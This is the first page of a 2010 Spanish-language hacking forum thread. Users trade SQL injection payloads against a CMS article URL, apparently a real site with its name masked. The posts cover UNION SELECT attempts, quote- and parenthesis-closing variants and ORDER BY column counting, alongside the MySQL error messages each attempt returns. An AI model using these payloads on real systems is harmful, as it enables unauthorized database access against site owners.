elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Problema al hacer una SQLi
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Problema al hacer una SQLi  (Leído 11,160 veces)
Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Problema al hacer una SQLi
« en: 1 Septiembre 2010, 19:24 pm »

Hola muy buenas a todos, probando una SQLi he encontrado lo que parece ser un posible vector de ataque:

Código:
http://www.mipagina.com/articulo/'1

CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1
CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1


Se supone que asi es vulnerable no?

Pero cuando intento hacer la injeción con esto:

Código:
-1+union+select+1,2,3,n--

(Con n me refiero a que voy subiendo de tablas)
Al insertar el -1 se va el error y no aparece ninguna tabla tras probar hasta 20 (no creo que haya mas, sinceramente).

Es vulnerable o simplemente no la estoy atacando bien?

Saludos

En línea

tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: Problema al hacer una SQLi
« Respuesta #1 en: 1 Septiembre 2010, 20:19 pm »

prueba con

-1') union all select 1,2,3,4,n--
En línea

Colaboraciones:
1 2
Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: Problema al hacer una SQLi
« Respuesta #2 en: 1 Septiembre 2010, 21:34 pm »

prueba con

-1') union all select 1,2,3,4,n--
Bad response :/

CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1
Gracias por tu ayuda :)

Saludos
En línea

tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: Problema al hacer una SQLi
« Respuesta #3 en: 1 Septiembre 2010, 22:01 pm »

es que segun la salida que pusiste al principio, estoy casi seguro que el cierre sería con

Código:
')
...

pueds probar a hacer:


-1') union all select 1,2,3,4,'n


fijate que la n lleva la comilla antes! en fin, prueba y postea!
En línea

Colaboraciones:
1 2
Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: Problema al hacer una SQLi
« Respuesta #4 en: 1 Septiembre 2010, 22:06 pm »

es que segun la salida que pusiste al principio, estoy casi seguro que el cierre sería con

Código:
')
...

pueds probar a hacer:


-1') union all select 1,2,3,4,'n


fijate que la n lleva la comilla antes! en fin, prueba y postea!

Mira, si hago esto:
Código:
-1')+union+all+select+1,2,3,4,'5--
Me devuelve:
CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1
Sin embargo si pruebo con:
Código:
-1')+union+all+select+1,2,3,'4,'5--
Da esto:
CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5--')' at line 1

Por lo que sospecho que las comillas no estan situadas como me parecia :S

Saludos

En línea

tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: Problema al hacer una SQLi
« Respuesta #5 en: 1 Septiembre 2010, 23:41 pm »

vale, prueba con:

Código:
-1')+union+all+select+1,2,3,4,('5--

(fijate en el parentesis)

sino, intenta realizar la consulta sin comentar el final de ella
En línea

Colaboraciones:
1 2
OzX


Desconectado Desconectado

Mensajes: 406

[NuKe] Team


Ver Perfil WWW
Re: Problema al hacer una SQLi
« Respuesta #6 en: 2 Septiembre 2010, 01:21 am »

hi bro.
http://www.mipagina.com/articulo/'1
provaste con?
http://www.mipagina.com/articulo/1'
http://www.mipagina.com/articulo/'1''
te muestra el mismo resultado ? o te tira algun error al poner 2 comillas simples?

http://www.mipagina.com/articulo/1+and+1=1+order+by+99+--+

y con eso que te muestra?
En línea

Undersecurity.net
Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: Problema al hacer una SQLi
« Respuesta #7 en: 2 Septiembre 2010, 09:35 am »

hi bro.
http://www.mipagina.com/articulo/'1
provaste con?
http://www.mipagina.com/articulo/1'
http://www.mipagina.com/articulo/'1''
te muestra el mismo resultado ? o te tira algun error al poner 2 comillas simples?

http://www.mipagina.com/articulo/1+and+1=1+order+by+99+--+

y con eso que te muestra?
He conseguido que con eso me devuelva:
CMS_GetContentIDByName: Unknown column '87' in 'order clause'

Por lo que hay mas tablas de las que sospechaba!
ES este codigo el que he usado:
Código:
-1')+and+1=1+order+by+87+--+


Y con dos comillas suelta esto:
CMS_GetContentIDByName: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''') OR (url_rewrite = ''1''') LIMIT 1' at line 1
Codigo usado:
Código:
'1''

Saludos
« Última modificación: 2 Septiembre 2010, 09:42 am por Debci » En línea

raul338


Desconectado Desconectado

Mensajes: 2.633


La sonrisa es la mejor forma de afrontar las cosas


Ver Perfil WWW
Re: Problema al hacer una SQLi
« Respuesta #8 en: 2 Septiembre 2010, 17:41 pm »

Código:
-1+union+select+1,2,3,n; --

:)
En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: Problema al hacer una SQLi
« Respuesta #9 en: 2 Septiembre 2010, 20:05 pm »

Código:
-1+union+select+1,2,3,n; --

:)
Ni siquiera me devuelve un error :S

Saludos
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema con SQLI Helper
Hacking
Nardo[N] 5 6,098 Último mensaje 24 Febrero 2011, 04:32 am
por Nardo[N]
es hacer posible SQLi?
Hacking
dArKo2 4 3,782 Último mensaje 28 Julio 2011, 21:19 pm
por Ambr0si0
como hacer SQLi más rápido??? y las huellas....???
Bugs y Exploits
ruben_linux 7 6,685 Último mensaje 27 Agosto 2011, 09:52 am
por Gambinoh
Problema SQLi real/practico
Nivel Web
Søra 4 4,136 Último mensaje 23 Septiembre 2011, 23:59 pm
por ~ Yoya ~
problema con sql y sqli « 1 2 »
PHP
mxsoun 15 8,336 Último mensaje 27 Julio 2017, 02:37 am
por mxsoun
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines